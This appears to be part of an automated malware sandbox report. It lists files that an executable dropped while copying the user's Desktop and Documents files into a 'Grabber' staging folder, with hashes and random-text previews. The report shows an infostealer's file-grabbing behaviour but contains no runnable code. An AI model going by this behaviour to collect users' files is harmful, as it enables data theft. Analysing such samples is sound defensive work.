SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	true
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XQACHMZIHU.png

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XQACHMZIHU.xlsx

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.693522326362693
Encrypted:	false
SSDEEP:	24:AYOwn5b+bbufFOUPjYbN1/FTKAGrkJYUZQvhuV:pOwV+bbutOUPj0N1/qkTIhE
MD5:	77EC10F00D9B9E14ECB007C137CF869E
SHA1:	F8B6D94864F593C39D9954BCFAEA4AAE12BFEB9A
SHA-256:	22D0155D015841BFCB00EE1D302110DDC7B01F19EB987C20991FF6B65C4FAB96
SHA-512:	AD432B54D1C4A5D602E721BBA01573FA97F8A71CB3DE4A917260451AAD038A10F13231E3A3FA30713419D8ED98CCD52C0686E62C8A065BF71F19B1CBDD154292
Malicious:	false
Preview:	XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLAAXCSYEMOBEEWLNTVTKLAAWZXJHAKYJHSMBMGKGYCJVIXFXKLBIIILIGERUIRCZLATCAWQPZDBSCIHXZ

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Documents\AFWAAFRXKO.png

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Documents\FACWLRWHGG.pdf

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697648179966054
Encrypted:	false
SSDEEP:	24:7/Q+t6r35NjtdGQB2dOAzD/GKwLon05avvk5byZGOQz2DfwAo+O:7oW6Xjt062d6LonB05+Vjf/o+O
MD5:	2B743B2063E25195104B0EB24000FB09
SHA1:	4BBE8DC0F1389A8C2082A1A102960A6DFA417E3D
SHA-256:	6BADB679FA8F658AD5B4BCFA108CE3CB4B16267EC34D0FDA395E0FDE077D6A35
SHA-512:	BFEA76E052B182E0FF523B5CFECBEDF46C5ED526779A92A23CFD0E0395DCD144EDA9950D01BEA17543625355701A248DB7C0873AC0998C7E30FE67ACD88BEE4D
Malicious:	false
Preview:	FACWLRWHGGUTKNRRDSQUQMZCBEYWHIGWQWDXAGWJENXOZWOWCCXESYMPIJTGQXPROJMVQPSXGHSYMONETHUFZZZWYBNNWDANRHNFGNMAPXCFFQQDTCIMRCOHAFIBMTZBZPXSMFDYHLCTPITIFTXZUDBYTJZHJKELKYLZQHQZYMSBYEFXYIVGTQEWIVDJIQTEZWNDCOSWOXEYAPNQABIDGYTDJVUKMXYENQOXDATDTJVPVZZMHBTMCEKAZAPACJJWDWTDMDDUOUKVMXWLWQJIUBISHPDQERGKUJVZNEQXZLZLPAAWAIISWMNZUCNHVPXDFUMDEQXILTXQAJMAARGKYBBBICJHNOFJVCGSQMBWXMQELPZMSXWNWZOHIKTQHSNOOEOBJZYHKSWSISVNUCPTNDKLJPXFFKNAZWAKYWAQWKPWLPQBKZJOKHWXUBBXWKQFWXTNIZFYWIGTLBHZHKFRJPDBJYRQPQBTZUQVURGNTQJTFZCFBTOGNCSXOZYULXOKVYONRQOTNOMUPVCDBYIRPNYZSLKSNBOWQKKNJMJHNRUWBXYJGSZSPXSONGCMHTNOICXWNYGZZSXUAIERVNFFQNXDQVRWFMTTMSSSOBHILBUKCDGSMNJBQTRQLBDQKVRGXKWZVMFALQRGBPLMGEORKLBYALNGJAXLKGBFGJJGJRUDKBMQEFJXXWMAJRDTIEDANEPUIJCTTDZYEQDJPJIWYDQDRTRUDDZSJLFZYIHKHRWEGVLQCYQAPXOIJCBELZDZEOFPKSIJQMAQMSMXBREQEEHWXGMHEUPNGVSDZAPNVXQJCPLULFQIXRMSFCUNHHUFFJVFNQWNUUXSOMSNJWOYNUHTHGAZSWYOKIKISIGFZEGFZHQIREUWAJLPABARUVHOGZWCJTJIKKPAQXNJIPQCFVNQOWRXDIFVHURRRNGLTJZAUJLDZUVLHLMXGCRXOISIAINZBFTCEVMHTOSDRBUXYFVYIYXOYHKTGTSHIRYW

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Documents\IVHSHTCODI.docx

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698618937757839
Encrypted:	false
SSDEEP:	12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
MD5:	FBFB8162B9366F7135B54193D54C2094
SHA1:	9F7291EB4E117104EE4215B83F38C18607438B02
SHA-256:	D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
SHA-512:	452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
Malicious:	false
Preview:	IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZ

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Documents\IVHSHTCODI.pdf

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698618937757839
Encrypted:	false
SSDEEP:	12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
MD5:	FBFB8162B9366F7135B54193D54C2094
SHA1:	9F7291EB4E117104EE4215B83F38C18607438B02
SHA-256:	D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
SHA-512:	452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
Malicious:	false
Preview:	IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZ

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Documents\IVHSHTCODI\AFWAAFRXKO.png

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Documents\IVHSHTCODI\FACWLRWHGG.pdf

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697648179966054
Encrypted:	false
SSDEEP:	24:7/Q+t6r35NjtdGQB2dOAzD/GKwLon05avvk5byZGOQz2DfwAo+O:7oW6Xjt062d6LonB05+Vjf/o+O
MD5:	2B743B2063E25195104B0EB24000FB09
SHA1:	4BBE8DC0F1389A8C2082A1A102960A6DFA417E3D
SHA-256:	6BADB679FA8F658AD5B4BCFA108CE3CB4B16267EC34D0FDA395E0FDE077D6A35
SHA-512:	BFEA76E052B182E0FF523B5CFECBEDF46C5ED526779A92A23CFD0E0395DCD144EDA9950D01BEA17543625355701A248DB7C0873AC0998C7E30FE67ACD88BEE4D
Malicious:	false
Preview:	FACWLRWHGGUTKNRRDSQUQMZCBEYWHIGWQWDXAGWJENXOZWOWCCXESYMPIJTGQXPROJMVQPSXGHSYMONETHUFZZZWYBNNWDANRHNFGNMAPXCFFQQDTCIMRCOHAFIBMTZBZPXSMFDYHLCTPITIFTXZUDBYTJZHJKELKYLZQHQZYMSBYEFXYIVGTQEWIVDJIQTEZWNDCOSWOXEYAPNQABIDGYTDJVUKMXYENQOXDATDTJVPVZZMHBTMCEKAZAPACJJWDWTDMDDUOUKVMXWLWQJIUBISHPDQERGKUJVZNEQXZLZLPAAWAIISWMNZUCNHVPXDFUMDEQXILTXQAJMAARGKYBBBICJHNOFJVCGSQMBWXMQELPZMSXWNWZOHIKTQHSNOOEOBJZYHKSWSISVNUCPTNDKLJPXFFKNAZWAKYWAQWKPWLPQBKZJOKHWXUBBXWKQFWXTNIZFYWIGTLBHZHKFRJPDBJYRQPQBTZUQVURGNTQJTFZCFBTOGNCSXOZYULXOKVYONRQOTNOMUPVCDBYIRPNYZSLKSNBOWQKKNJMJHNRUWBXYJGSZSPXSONGCMHTNOICXWNYGZZSXUAIERVNFFQNXDQVRWFMTTMSSSOBHILBUKCDGSMNJBQTRQLBDQKVRGXKWZVMFALQRGBPLMGEORKLBYALNGJAXLKGBFGJJGJRUDKBMQEFJXXWMAJRDTIEDANEPUIJCTTDZYEQDJPJIWYDQDRTRUDDZSJLFZYIHKHRWEGVLQCYQAPXOIJCBELZDZEOFPKSIJQMAQMSMXBREQEEHWXGMHEUPNGVSDZAPNVXQJCPLULFQIXRMSFCUNHHUFFJVFNQWNUUXSOMSNJWOYNUHTHGAZSWYOKIKISIGFZEGFZHQIREUWAJLPABARUVHOGZWCJTJIKKPAQXNJIPQCFVNQOWRXDIFVHURRRNGLTJZAUJLDZUVLHLMXGCRXOISIAINZBFTCEVMHTOSDRBUXYFVYIYXOYHKTGTSHIRYW

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Documents\IVHSHTCODI\IVHSHTCODI.docx

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698618937757839
Encrypted:	false
SSDEEP:	12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
MD5:	FBFB8162B9366F7135B54193D54C2094
SHA1:	9F7291EB4E117104EE4215B83F38C18607438B02
SHA-256:	D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
SHA-512:	452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
Malicious:	false
Preview:	IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZ

C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290\user@767668_en-CH\Grabber\DRIVE-C\Users\user\Documents\IVHSHTCODI\PSAMNLJHZW.jpg

Download File

Process:	C:\Users\user\Desktop\uyz4YPUyc9.exe
File Type:	PSA archive data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698960923923406
Encrypted:	false
SSDEEP:	24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
MD5:	186B4E00711974F7AF578BD6FF959BBF
SHA1:	642B794D73FB09655FBFF8EDCAAA267634554569
SHA-256:	2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
SHA-512:	DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
Malicious:	false
